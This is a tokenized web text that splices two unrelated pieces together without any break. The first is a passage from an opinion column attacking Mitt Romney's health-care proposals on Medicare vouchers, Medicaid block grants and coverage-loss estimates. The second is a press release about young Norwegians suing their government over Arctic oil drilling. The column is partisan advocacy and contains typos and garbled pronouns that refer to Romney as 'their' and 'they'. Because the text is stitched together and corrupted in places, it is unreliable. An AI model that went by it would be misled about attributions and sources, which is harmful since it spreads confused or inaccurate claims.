The one , crucial unknown here is whether Romney would provide a refundable tax credit for health insurance , which means even poorer people could benefit from it , rather than a tax deduction . If so , it 's possible more people would get insurance ; at least one estimate of McCain 's plan , which had a refundable credit , suggested it 'd even approach , although not meet , the coverage expansion of what eventually became the Affordable Care Act . But that estimate was something of an outlier . More important , as Ramesh Ponnuru reported in their Bloomberg View column this week , the Romney campaign is leanng against doing so—most likely , I expect , because refundable tax credits cost a lot more money than tax deductions .
Republicans like Romney say they wish to “ repeal and replace ” the Affordable Care Act . But , as my friend Ed Kilgore observed recently at the Washington Monthly , these sorts of changes suggest their agenda is a lot more ambitious : It 's “ repeal and reverse . ”
Turn Medicare into a voucher scheme : Romney has been characteristically vague about this element , too , but he 's made plain their intention to adopt a scheme like the one House Budget Chairman Paul Ryan has proposed . Today Medicare guarantees a set of benefits to all seniors , by providing a government-run insurance plan with the option to enroll in a private alternative . Romney would instead opt to create a “ premium support ” plan , which basically means giving seniors vouchers and having them use it to get insurance . ( Romney would preserve traditional , government-run Medicare as an option , but many experts question whether it would survive for long .
The premium support idea has been kicking around a long time and there are versions of it that even liberals can support . The Affordable Care Act 's scheme for covering non-elderly Americans might fairly be described as one . But applying vouchers to the Medicare population , with its higher medical needs , would be inherently risky—something govenrmetn should do only with careful regulation and with guarantees of adequate funding . Romney and their Republican allies have indicated virtually no interest in doing this . On the contrary , they 've indicated they want to squeeze Medicare for even more savings than the Affordable Care Care would ( which has n't stopped Romney , or any other Republican , for criticizing the Affordable Care Act 's cuts as stealing from seniors ) .
These are the main reasons why Henry Aaron , the Brookings economist who helped develop andp promote the idea of premium support for Medicare , has warned against recent Republican versions of it .
Transform Medicaid into a block grant : The changes Romney envisions for Medicaid are , if anything , more profound . Today , Medicaid is an entitlement program . And that has as much significance for government as it does for individual beneficiaries .
As a condition for participating in the program , states must make Medicaid coverage available to everybody who meets the program 's eligibility guidelines—and provide a comprehensive set of benefits . States have authority to offer coverage to more people or to offer greater benefits to those who get it , if they choose . But they may not do less than the law requires . In exchange , the federal government agrees to cover a large share of the costs , even if swelling enrollment—the kind , for example , we typically see during economic downturns—makes the program a lot more expensive .
Romney would take away Medicaid 's entitlement status and turn Medicaid into a so-called block grant . Under such an arrangement , the federal government would basically cut the states a check , based on a fixed formula , and let them spend Medicaid money however they see fit . Block granting Medicaid has been a Republican cause at least since the early 1980s , when the Reagan Administration nearly pushed such a proposal through Congress , and it 's a prominent ( if under-appreciated ) feature of Ryan 's House budget . The theory is that states could provide better , broader coverage through innovation , if only they had more freedom .
But Medicaid already pays very little for services . While there are surely innovations that could make the program better , do you trust Rick Scott to make sure changes improve life for poor , vulnerable people in Florida ? What about Rick Perry in Texas ? It does n't take a lot of imagination to see how that could go horribly wrong .
And the structural changes to the program are only part of the problem . Republican block grant proposals typically envision massive spending cuts to the program . Romney has n't been as specific about this , naturally . But if they were true to their vow to cap federal spending at 20 percent of gross domestic product while setting aside 4 percent for defense spending , it 's virtually certain he 'd end up cutting Medicaid by as much if not more than Ryan would .
It 's not possible to say exactly what this would mean in practice . But it 's possible to get a sense of scale . A report from the Kaiser Family Foundation , citing estimates from researchers at the Urban Institute , said that Ryan 's proposal would mean between 14 million and 27 million people would lose Medicaid coverage . That 's above and beyond those who would lose Medicaid coverage because the Affordable Care Act , which expands Medicaid to more people , would n't take effect under the Ryan-Romney plan .
Throw in the more than 30 million who would n't get insurance once the Affordable Care Act came off the books , plus those who 'd lose coverage because of Romney 's changes to private insurance , and you end up with between 45 and 58 million fewer people with health insurance , as Cutler first observed . ( The damage would be less severe if Romney went with a refundable tax credit , but it 'd still be more people uninsured than under current law and probably more people uninsured than today . ) And , again , that does n't include the many other people with insurance who will end up with weaker coverage .
* * *
Those are a lot of policy details , I know . But here 's a ( relatively ) simple way to think about it . Since modern health insurance first came to the United States in the 1930s , coverage has expanded , albeit fitfully , through a combination of private and public sector efforts . These efforts culminated in the Affordable Care Act , which , whatever it flaws , put in place a system that could eventually make affordable , decent coverage available to all Americans . Romney would run this process in reverse .
They and their supporters call that progress . Would you ?
Update : Reading this post a few hours it went live , I thought I did n't put enough emphasis on the fact that the 58 million figures was an upper bound on the number of people who could lose health insurance . It 's a very credible figure from a very credible source—who , in turn , drew on nonpartisan , expert analyses of ideas Romney has embraced . But given Romney 's lack of specificity , and the propensity of people to seize on precise numbers , I 've reworded my initial reference to make these facts clear . I also clarified exactly how Romney 's proposed changes would transform how people get their health insurance .
follow me on Twitter @ CitizenCohn
OSLO , Norway - Today young people filed a constitutional climate lawsuit against the Norwegian government for allowing oil companies to drill for new oil in the Arctic Barents Sea , endangering young people and future generations with more climate pollution . The plaintiffs , Nature and Youth – the largest youth-led organization in Norway – and Greenpeace Norway , argue that Norway has violated citizens ' and future generations ' constitutional right to a healthy environment , joining youth around the world who are taking actions against their governments .
“ We will argue in court that the Norwegian government has an obligation to keep its climate promises and will invoke the people 's right to a healthy environment for ours and future generations . This is the People vs. Arctic oil , ” said Ingrid Skjoldvær from Nature and Youth .
The lawsuit demands that Norway uphold its constitutional guarantee for future generations as it is written in article 112 of Norway´s Constitution :
“ Every person has the right to an environment that is conducive to health and to a natural environment whose productivity and diversity are maintained . Natural resources shall be managed on the basis of comprehensive long-term considerations which will safeguard this right for future generations as well . The authorities of the state shall take measures for the implementation of these principles ” .
SCROLL TO CONTINUE WITH CONTENT Help Keep Common Dreams Alive Our progressive news model only survives if those informed and inspired by this work support our efforts
“ Signing [ the Paris Agreement ] while throwing open the door to Arctic oil drilling is a dangerous act of hypocrisy . By allowing oil companies to drill in the Arctic , Norway risks undermining global efforts to address climate change . When the government fails to redress this we have to do what we can to stop it , ” said Truls Gulowsen , Greenpeace Norway .
“ Youth are rising up globally and taking their governments to court to seek protection of their inalienable rights to a stable climate system , ” said Julia Olson , executive director of Our Children 's Trust , and lead counsel on another climate lawsuit brought by 21 young people against the United States government . “ This case filed today in Norway builds on similar cases brought by young people in Sweden , Pakistan , Uganda , the Philippines , and in states across the U.S. Our Children 's Trust is working in partnership with young people around the world to elevate their voices and provide them with legal and scientific support . This youth legal movement is growing . ”
The lawsuit follows on the footsteps of other climate actions led by young people to hold governments ' accountable . One month ago , young people from around the U.S. had their landmark constitutional climate lawsuit heard before U.S. District Court Judge Ann Aiken , and during that same week , Swedish youth sued Sweden for moving forward with a disastrous coal deal .
Our Children 's Trust is a nonprofit organization , elevating the voice of youth , those with most to lose in the climate crisis , to secure the legal right to a healthy atmosphere and stable climate on behalf of present and future generations . We lead the global human rights and environmental justice campaign to implement enforceable science-based Climate Recovery Plans that will return atmospheric carbon dioxide concentration to levels below 350 ppm . Youth have secured judicial rulings in their favor in WA , NM and MA , and in their landmark U.S. federal climate lawsuit , and have multiple other cases pending . www.ourchildrenstrust.org/
Natur og ungdom ( “ Nature and Youth ” ) is Norway 's largest environmental organization for young people . The organization was founded in 1967 and is an independent youth organization with an independent board , national assembly and national congress . As of 31 December 2015 , the organization had 7,672 members and 88 local chapters throughout Norway . One of the organization 's objectives is to strive to ensure far-sighted utilization , protection and fairer distribution of the world 's resources . In accordance with its Articles of Association , the organization has resolved to base its work on the premise that the future of the human race is dependent on the preservation of the natural environment 's functions , productivity and diversity .
Greenpeace is an independent global campaigning organization that acts to change attitudes and behavior , to protect and conserve the environment and to promote peace by : catalyzing an energy revolution , defending our oceans , protecting the world 's ancient forests , working for disarmament and peace , creating a toxic free future , and campaigning for sustainable agriculture . Greenpeace is present in more than 55 countries across Europe , the Americas , Asia , Africa , and the Pacific . www.greenpeace.org
# # #
